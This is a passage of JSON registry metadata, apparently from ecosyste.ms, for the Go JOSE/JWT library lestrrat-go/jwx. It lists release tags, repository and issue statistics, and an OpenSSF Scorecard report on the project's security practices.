c143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.123Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jws/internal/cmd/genheader","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jws/internal/cmd/genheader","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jws/internal/cmd/genheader","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jws/internal/cmd/genheader/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjws%2Finternal%2Fcmd%2Fgenheader/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjws%2Finternal%2Fcmd%2Fgenheader/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjws%2Finternal%2Fcmd%2Fgenheader/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjws%2Finternal%2Fcmd%2Fgenheader/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjws%2Finternal%2Fcmd%2Fgenheader/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjws%2Finternal%2Fcmd%2Fgenheader/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11387069,"name":"github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwe/internal","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2025-11-07T08:04:48.436Z","latest_release_number":null,"last_synced_at":"2026-05-10T03:02:21.138Z","created_at":"2025-02-27T17:36:25.735Z","updated_at":"2026-05-10T03:02:21.138Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc","install_command":"go get github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjw